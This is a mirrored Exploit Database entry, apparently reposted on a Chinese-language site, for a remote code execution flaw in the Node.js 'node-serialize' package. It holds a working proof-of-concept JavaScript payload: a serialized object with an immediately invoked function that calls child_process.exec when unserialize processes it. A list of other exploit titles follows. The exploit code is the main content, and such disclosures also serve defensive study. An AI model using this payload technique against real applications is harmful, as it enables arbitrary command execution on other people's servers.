Node.JS – ‘node-serialize’ Remote Code Execution

Exploit Database
133 阅读

作者： OpSecX

日期： 2017-02-08
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/45265/

var serialize = require('node-serialize');

var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';

serialize.unserialize(payload);

last Exploits
Node.JS – ‘node-serialize’ Remote Code Execution的更多信息

Docker based datastores for IBM Instana 241-2 243-0 – No Authentication：
Distributed Ruby – Send instance_eval/syscall Code Execution (Metasploit)：
Cisco DCNM JBoss 10.4 – Credential Leakage：
Nginx 1.4.0 (Generic Linux x64) – Remote Overflow：
Omni-NFS Server – Remote Buffer Overflow (Metasploit)：
OpenSMTPD 6.6.3 – Arbitrary File Read：
EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)：
VideoLAN VLC Media Player 1.1.x – Calling Convention Remote Buffer Overflow：